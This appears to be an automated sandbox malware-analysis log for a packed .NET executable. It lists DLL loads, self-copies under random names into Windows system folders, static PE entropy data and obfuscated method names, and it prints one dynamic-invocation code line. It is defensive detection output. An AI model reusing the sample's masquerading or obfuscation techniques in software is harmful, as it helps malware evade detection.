Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Windows NT\TableTextService\en-US\3569ad0d0ffd50	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Uninstall Information\3569ad0d0ffd50	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\OH6KO8NBy1.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\3569ad0d0ffd50	Jump to behavior

Source: OH6KO8NBy1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: OH6KO8NBy1.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: OH6KO8NBy1.exe

Static file information: File size 1656320 > 1048576

Source: OH6KO8NBy1.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x193e00

Source: OH6KO8NBy1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1967082208.0000000001050000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2633450960.000000001BDB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbN source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2524027388.000000001B71D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1865148679.000000001AD9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2633450960.000000001BDB0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: OH6KO8NBy1.exe, Qr2vJkulGbfJGi4ursy.cs

.Net Code: Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777246)),Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777260))})

Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0E3E0 push edi; ret	5_2_00007FFD9BB0E4E2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0F450 push ebp; ret	5_2_00007FFD9BB0F46A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0F3E5 push ecx; ret	5_2_00007FFD9BB0F3F2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0F400 push edx; ret	5_2_00007FFD9BB0F41A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0F38D push eax; ret	5_2_00007FFD9BB0F3A2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BB0BD68 push E8FFFFFFh; iretd	5_2_00007FFD9BB0BD6D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 5_2_00007FFD9BACBD2D push ecx; retf FFFFh	5_2_00007FFD9BACD014
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB1BD68 push E8FFFFFFh; iretd	18_2_00007FFD9BB1BD6D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BB23A73 pushad ; retf	18_2_00007FFD9BB23A9D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 18_2_00007FFD9BADBD2D push ecx; retf FFFFh	18_2_00007FFD9BADD014
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0F450 push ebp; ret	23_2_00007FFD9BB0F46A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0F3E5 push ecx; ret	23_2_00007FFD9BB0F3F2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0F3E8 push ecx; ret	23_2_00007FFD9BB0F3F2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0F400 push edx; ret	23_2_00007FFD9BB0F41A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0F38D push eax; ret	23_2_00007FFD9BB0F3A2
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB12B10 pushad ; ret	23_2_00007FFD9BB12B11
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB13A73 pushad ; retf	23_2_00007FFD9BB13A9D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB11FDE push edi; ret	23_2_00007FFD9BB11FDF
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB12578 pushad ; ret	23_2_00007FFD9BB125A1
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB12588 pushad ; ret	23_2_00007FFD9BB125A1
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB12500 pushad ; ret	23_2_00007FFD9BB1251A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BB0BD68 push E8FFFFFFh; iretd	23_2_00007FFD9BB0BD6D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 23_2_00007FFD9BACBD2D push ecx; retf FFFFh	23_2_00007FFD9BACD014
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BAFBD68 push E8FFFFFFh; iretd	38_2_00007FFD9BAFBD6D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB03A73 pushad ; retf	38_2_00007FFD9BB03A9D
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB069B9 push esi; ret	38_2_00007FFD9BB069CA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB06881 push esp; ret	38_2_00007FFD9BB0689A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB067A9 push esp; ret	38_2_00007FFD9BB067BA
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BB06630 push edx; ret	38_2_00007FFD9BB0669A
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 38_2_00007FFD9BABBD2D push ecx; retf FFFFh	38_2_00007FFD9BABD014
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Code function: 43_2_00007FFD9BB0F450 push ebp; ret	43_2_00007FFD9BB0F46A

Source: OH6KO8NBy1.exe	Static PE information: section name: .text entropy: 7.424721058319474
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe.0.dr	Static PE information: section name: .text entropy: 7.424721058319474
Source: Memory Compression.exe.0.dr	Static PE information: section name: .text entropy: 7.424721058319474
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe0.0.dr	Static PE information: section name: .text entropy: 7.424721058319474
Source: EGjcLJxUTLCptztefbFicvsgXASnZ.exe1.0.dr	Static PE information: section name: .text entropy: 7.424721058319474

Source: OH6KO8NBy1.exe, Ve1cELzpXOAiOjGbv9.cs	High entropy of concatenated method names: 'K8Hkkgc7Ct', 'FEEkGMiCNl', 'XUNk20PNnc', 'lTHk3Qg1WO', 'Xgmkw9g3vn', 'VgJkqaSNyr', 'JxKkJddVrD', 'KJ5TcTktTSaYcWqwrT4k', 'kLakkKktiLGeyqrqbSys', 'bftckOktF6fBRooTBgJL'
Source: OH6KO8NBy1.exe, x1DWgjnrSjbauXolqZ7.cs	High entropy of concatenated method names: 'rDcn95DuRR', 'Gs6neyTgvU', 'WsvnPUgMOx', 'a2L2ghkm0RpD7KZGf1iU', 'iGPDxgkmo9ggqhLxijlq', 'suIYEWkmHsivX35L2LEH', 'tqgE5okmZsyRTojcCvct', 'J0b6jakmC1VXNsLtk3lx', 'OCct0Rkmr3jW7oDVx9gf', 'pbdrErkmLhmb02JAQ75y'
Source: OH6KO8NBy1.exe, w1c6YnswbdDHwFf3fIH.cs	High entropy of concatenated method names: 'wyOOl5kjReufJPmEWqv5', 'UTOpGdkjVKe5HkixHXYj', 'WwXeAlkjXOsVVnj9ZVfu', 'RNgsygyPCq', '_1R8', '_3eK', 'rRNsJH1qb1', 'Dbgso4mcex', 'gV4sH6HlyL', 'gQos0NQJVw'
Source: OH6KO8NBy1.exe, IxEpTmJCWgSWwBQ7BFS.cs	High entropy of concatenated method names: '_54f', 'd65', 'ODok22YAfAO', 'Nc8k23Y4JD4', 'AWAkyK4ihup', 'RJFk2plj3EX', 'Eg6VZfkaIhT0uPZ1pWAo', 'BrYvFykaxpL9tcOiTEjl', 'QgP8GWkaBjkh3IboZacm', 'xf6vF6kaUFT1jtD4c5t9'
Source: OH6KO8NBy1.exe, oZR8F82aXprYBh6qK8e.cs	High entropy of concatenated method names: 'z8K2Vu6OKR', 'NsQ2XxsjJb', 'LEpYAIkF6j36CRnQTlGl', 'Ewd74ZkFQTiNnEvlmuu3', 'lEOUMGkFDKoKIeIsZicM', 'GDiEObkFtSPWwbwlTCuU', 'OJ9JFOkFnMU4fY55I7G3', 'ai18sWkFTei5Dl7TNpV7', 'zyZj7YkFit7JOjRZdbWd'
Source: OH6KO8NBy1.exe, w3mb9j27GTnOfjRrLYl.cs	High entropy of concatenated method names: 'K8e2MFpRqE', 'Cr62fljMa2', 'erW2z84LQL', 'rxRckakFScUhDCTKiUIu', 'D486e2kFdWtdgqjkaiee', 'sEZA54kF5MguXUI6EDan', 'PpM7GGkFmhmi334v4A2T', 'bqY2bioxex', 'g392W5ikrx', 'f0I21c8CfR'
Source: OH6KO8NBy1.exe, J1KBu9XgToJfQU5LQhi.cs	High entropy of concatenated method names: 'IfkD0RkbN3VWMhaPWNe2', 'TtPjnMkbXoBaPJsG8Cq8', 'qan8QQkbO50tPJO4mwbT', 'L4hc8fkb4PONgm4Bt2jj', 'lvrbo3kbalry6BYdygy3', 'zUCDKdkbRAPMjmHOrHl0', 'aC66sqkbsHe04mUh0XIF', 'Slut2QkbcJJP1EnmX1W9'
Source: OH6KO8NBy1.exe, e7nNAg8ALhewoq4HQiS.cs	High entropy of concatenated method names: 'MYh8lPUhqL', 'rOM8hUtk7E', 'vixdBKkTGUTa043sKklD', 'fCcwmPkTkUDlEJVedSMH', 'i4SDWjkT8N7YNENeIY0u', 'IPmrhOkT2hRicqR2k1GM', 'Xvv6eckT3dxjmWKBgmkU', 'bpQFPykTwNdoO0IIVrYx', 'VOFgvikTqoujVw6kcGR9'
Source: OH6KO8NBy1.exe, b72uhOVIEpDC2JLCAAo.cs	High entropy of concatenated method names: 'DnUVBdTu2U', 'X5TVUMvSoX', 'Kk8V59Whok', 'rGxVmCryKx', 'pUvVSXEWr0', 'NyfVdn3aeb', 'XmWVj3GLE6', 'FJbV78FPHj', 'A3KVYRhZjC', 'yT2Vb4fgqf'
Source: OH6KO8NBy1.exe, LLuKj3ek0m0HLZJsvI.cs	High entropy of concatenated method names: 'eOi4i72Y8', 'yfFJF1kDuOPAgnbApaYr', 'fpNXsMkDv8ZdUS5VZGwJ', 'HF7kFOkDWcNaNoXXJClR', 'ndj3o1kD1QnVG7v8Wccx', 'xVTALotdr', 'XF0gtmb3G', 'bRwlsZHbH', 'BwQh7ycbd', 'qffEGmbXl'
Source: OH6KO8NBy1.exe, fERMkYngXNssLf4yTQC.cs	High entropy of concatenated method names: 'm8rnhlPZd9', 'UySnEU7NJN', 'j3lnKNEACR', 'VNtn6TQ5BB', 'GWbnQ8iTKO', 'jVknD23lqe', 'etBougkmAPnZ21OK8JkH', 'xR1rR6kmeqEMNDNEvDCZ', 'TWBKE8kmPjX8lUTbCU95', 'UyFZsMkmg5pVpbGSU9Rn'
Source: OH6KO8NBy1.exe, N2VujOMBctjcLuqC6Tq.cs	High entropy of concatenated method names: 'RTqkwSaRSMT', 'w54kwdsEBvH', 'fMckwjemS0r', 'lqvkw7RdNKZ', 'SMfkwYerb4b', 'doxkwbYUH9m', 'X7tkwWhQcNx', 'BTwfJmVXXu', 'nH3kw1jx9Xx', 'lMQkwufAdFx'
Source: OH6KO8NBy1.exe, vVsTnZGMwhpQZMeBYH7.cs	High entropy of concatenated method names: 'YZR2rZovZ6', 'l3vNpKkFGK5Ku82IAZcW', 'cJbJekkFkT2Rm8Ae7VGi', 'zOLNoLkF8eSMPAKbdJLn', 'C6r2WSkF2p5P8s5gU8k9', 'RqvHXRkFykjmSm7BZcTq', 'oLMM6NkFwKhUOYPmoMdy', 'znF5PFkFqL5q2eH9VMja', 'Ja82ECmk9m', 'PtgfEQkF0FnhdBECUROL'
